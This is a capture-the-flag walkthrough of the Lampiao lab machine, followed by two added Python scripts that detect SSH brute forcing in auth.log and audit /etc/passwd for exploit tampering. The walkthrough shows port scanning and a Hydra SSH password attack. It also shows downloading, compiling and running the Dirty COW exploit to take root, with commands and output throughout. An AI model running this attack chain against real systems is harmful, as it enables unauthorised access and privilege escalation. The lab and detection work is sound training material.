Lampiao

TARGET IP: 10.0.2.10
by sc00by

#####
nmap:
#####

$> nmap -sV -p- -vvv -n 10.0.2.10

Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-18 18:10 EDT
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 18:10
Scanning 10.0.2.10 [1 port]
Completed ARP Ping Scan at 18:10, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:10
Scanning 10.0.2.10 [65535 ports]
Discovered open port 80/tcp on 10.0.2.10
Discovered open port 22/tcp on 10.0.2.10
Discovered open port 1898/tcp on 10.0.2.10
Completed SYN Stealth Scan at 18:10, 3.80s elapsed (65535 total ports)
Initiating Service scan at 18:10
Scanning 3 services on 10.0.2.10
Completed Service scan at 18:10, 13.98s elapsed (3 services on 1 host)
NSE: Script scanning 10.0.2.10.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:10
Completed NSE at 18:10, 10.80s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:10
Completed NSE at 18:10, 0.01s elapsed
Nmap scan report for 10.0.2.10
Host is up, received arp-response (0.000099s latency).
Scanned at 2018-09-18 18:10:08 EDT for 29s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?   syn-ack ttl 64
1898/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))

###########################
wordlist of 10.0.2.10:1898:
###########################

$> cewl 10.0.2.10:1898 > lampiao.dic
$> ls
lampiao.dic

!!! User(s) found: tiago Eder

####################################################
Hydra brute force against the users found on the site:
####################################################

$> hydra -t 4 -l tiago -P lampiao.dic 10.0.2.10 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-18 18:17:42
[DATA] max 4 tasks per 1 server, overall 4 tasks, 836 login tries (l:1/p:836), ~209 tries per task
[DATA] attacking ssh://10.0.2.10:22/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 772 to do in 00:13h, 4 active
[22][ssh] host: 10.0.2.10   login: tiago   password: Virgulino
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-09-18 18:20:08

!!! Password found for 'tiago': Virgulino

##################
SSH in as 'tiago':
##################

$> ssh tiago@10.0.2.10
tiago@10.0.2.10's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Sep 18 19:19:56 BRT 2018

  System load:  0.0               Processes:           110
  Usage of /:   7.5% of 19.07GB   Users logged in:     0
  Memory usage: 10%               IP address for eth0: 10.0.2.10
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Tue Sep 18 18:58:25 2018 from 10.0.2.4
tiago@lampiao:~$

#############################################
Machine Enumeration / Vulnerability Scanning:
#############################################

tiago@lampiao:~$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
--2018-09-18 19:33:00--  https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.48.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.48.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65668 (64K) [text/plain]
Saving to: ‘les.sh’

100%[======================================================================================================================>] 65,668      --.-K/s   in 0.09s

2018-09-18 19:33:00 (712 KB/s) - ‘les.sh’ saved [65668/65668]

tiago@lampiao:~$ chmod u+x les.sh
tiago@lampiao:~$ ./les.sh

!!! INTERESTING FIND: dirtyc0w2:

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

##########################################
Get dirtyc0w2 exploit onto target machine:
##########################################

tiago@lampiao:~$ wget https://www.exploit-db.com/download/40847.cpp
--2018-09-18 19:36:17--  https://www.exploit-db.com/download/40847.cpp
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘40847.cpp’

    [ <=>                                                                                                                      ] 10,531      --.-K/s   in 0.04s

2018-09-18 19:36:17 (260 KB/s) - ‘40847.cpp’ saved [10531]

tiago@lampiao:~$

########################
Compile and run exploit:
########################

tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
tiago@lampiao:~$ ls
40847.cpp  dcow  les.sh
tiago@lampiao:~$ ./dcow
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)
tiago@lampiao:~$

####################################
Take over root control and get flag:
####################################

tiago@lampiao:~$ ssh root@10.0.2.10
The authenticity of host '10.0.2.10 (10.0.2.10)' can't be established.
ECDSA key fingerprint is ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.2.10' (ECDSA) to the list of known hosts.
root@10.0.2.10's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Sep 18 19:30:29 BRT 2018

  System load:  0.0               Processes:           106
  Usage of /:   7.5% of 19.07GB   Users logged in:     0
  Memory usage: 10%               IP address for eth0: 10.0.2.10
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Fri Apr 20 14:46:57 2018 from 192.168.108.1
root@lampiao:~# ls
flag.txt
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366
root@lampiao:~# whoami
root
root@lampiao:~#

sc00by was here :)
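The Hydra run above pushed 64 password guesses a minute at sshd for three minutes before it hit Virgulino, and sshd writes one "Failed password" line to /var/log/auth.log for every one of them, so the same attack is trivial to spot from the defender's side. The following detector is an added example and is not part of sc00by's writeup: it is a small Python script run over constructed auth.log lines (host name, PIDs, source ports and timestamps are made up to mirror the Hydra timing above; the 10-failures-per-minute threshold is an assumption). It flags any source IP that produces a burst of failures and records the first successful login from that IP afterwards, which is the compromised account.

```python
"""Spot an SSH password-guessing burst, like the Hydra run above, in auth.log.

Added example, not from the original writeup. The log lines in sample_log()
are constructed to look like what OpenSSH on Ubuntu 14.04 writes to
/var/log/auth.log; host name, PIDs, ports and times are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One line per failed password and one per accepted password, e.g.
# "Sep 18 18:17:42 lampiao sshd[2300]: Failed password for tiago from 10.0.2.4 port 40000 ssh2"
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(ts, year=2018):
    # syslog timestamps carry no year; the constructed data is from 2018.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=10, window_sec=60):
    """Return {ip: {"failures", "users", "success"}} for every source IP with
    at least `threshold` failed passwords inside any `window_sec` window.
    "success" is the first (user, time) accepted from that IP after the burst
    began, or None. Threshold and window are assumptions, not sshd settings."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    accepted = defaultdict(list)   # ip -> [(time, user)]
    for line in lines:
        m = FAILED.match(line)
        if m:
            failures[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
            continue
        m = ACCEPTED.match(line)
        if m:
            accepted[m["ip"]].append((parse_ts(m["ts"]), m["user"]))

    hits = {}
    for ip, events in failures.items():
        events.sort()
        # Sliding window over the sorted failure times: does any window hold
        # `threshold` or more failures?
        start, burst = 0, False
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_sec:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        first_fail = events[0][0]
        success = next(((u, t) for t, u in sorted(accepted.get(ip, []))
                        if t >= first_fail), None)
        hits[ip] = {"failures": len(events),
                    "users": sorted({u for _, u in events}),
                    "success": success}
    return hits


def sample_log():
    """Constructed lines: a Hydra-like burst from 10.0.2.4 (about one try a
    second, matching the 64 tries/min above) and a benign user on 10.0.2.20."""
    lines = []
    base = datetime(2018, 9, 18, 18, 17, 42)
    for i in range(15):
        t = base + timedelta(seconds=i)
        lines.append(f"{t:%b %d %H:%M:%S} lampiao sshd[{2300 + i}]: "
                     f"Failed password for tiago from 10.0.2.4 port {40000 + i} ssh2")
    lines.append("Sep 18 18:20:08 lampiao sshd[2400]: Accepted password for tiago from 10.0.2.4 port 40120 ssh2")
    lines.append("Sep 18 18:05:01 lampiao sshd[2100]: Failed password for eder from 10.0.2.20 port 51000 ssh2")
    lines.append("Sep 18 18:09:30 lampiao sshd[2101]: Accepted password for eder from 10.0.2.20 port 51001 ssh2")
    return lines


if __name__ == "__main__":
    for ip, info in detect_bruteforce(sample_log()).items():
        print(f"{ip}: {info['failures']} failures against {','.join(info['users'])}, "
              f"then accepted login: {info['success']}")
```

Against a live box the same function reads /var/log/auth.log (or the journal) instead of sample_log(); a single slow guess such as eder's one failure is ignored, which is why a count over a time window rather than a raw total is used.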
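The dcow build of 40847 does not add a user: it uses the Dirty COW write to replace the "x" in root's own /etc/passwd entry with a hash of dirtyCowFun, which is why "ssh root@10.0.2.10" accepts that password afterwards and why the box no longer matches its original state. The audit below is an added example and not part of the writeup. It checks an /etc/passwd image for a hash stored in the password field (on a shadow-suite system like this Ubuntu 14.04 that field is always "x"), for other uid-0 accounts, and diffs the file against a trusted copy so the original root line can be put back. The passwd contents and the hash string are constructed.

```python
"""Audit an /etc/passwd image for the trace dcow (EDB 40847) leaves behind.

Added example, not from the original writeup. TAMPERED and TRUSTED are
constructed; the hash in TAMPERED is a placeholder, not the real one.
"""


def audit_passwd(passwd_text):
    """Return a list of (severity, line_no, message) for suspicious entries.

    On a system that uses /etc/shadow every password field in /etc/passwd is
    "x"; anything else means a hash (or no password at all) is being honoured
    straight from passwd, which is exactly what the exploit above arranged."""
    findings = []
    seen = {}
    for n, line in enumerate(passwd_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("warn", n, f"malformed entry with {len(fields)} fields: {line}"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(("crit", n, f"{name}: empty password field, no password required"))
        elif pw != "x":
            findings.append(("crit", n, f"{name}: password hash stored in /etc/passwd, expected 'x'"))
        if uid == "0" and name != "root":
            findings.append(("crit", n, f"{name}: uid 0 account other than root"))
        if name in seen:
            findings.append(("warn", n, f"{name}: duplicate entry, first seen at line {seen[name]}"))
        seen.setdefault(name, n)
    return findings


def diff_entries(current_text, trusted_text):
    """Map user -> (trusted_line, current_line) for every entry that differs
    between the live file and a trusted copy; a side that lacks the user is
    reported as None. Used to see what to restore after an exploit run."""
    def by_name(text):
        return {l.split(":")[0]: l for l in text.splitlines()
                if l.strip() and not l.startswith("#")}
    cur, ref = by_name(current_text), by_name(trusted_text)
    return {u: (ref.get(u), cur.get(u))
            for u in sorted(set(cur) | set(ref)) if cur.get(u) != ref.get(u)}


# Constructed: what the file looks like after dcow ran (placeholder hash)...
TAMPERED = """\
root:$6$dcow$PLACEHOLDERHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tiago:x:1000:1000:Tiago,,,:/home/tiago:/bin/bash
"""

# ...and a trusted copy taken before the run.
TRUSTED = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tiago:x:1000:1000:Tiago,,,:/home/tiago:/bin/bash
"""

if __name__ == "__main__":
    for sev, n, msg in audit_passwd(TAMPERED):
        print(f"[{sev}] line {n}: {msg}")
    for user, (before, after) in diff_entries(TAMPERED, TRUSTED).items():
        print(f"{user}: restore '{before}' over '{after}'")
```

On the real box the two inputs are open("/etc/passwd").read() and whatever backup the exploit or the analyst kept; running audit_passwd on TRUSTED returns nothing, which is the state to get back to before handing the machine on.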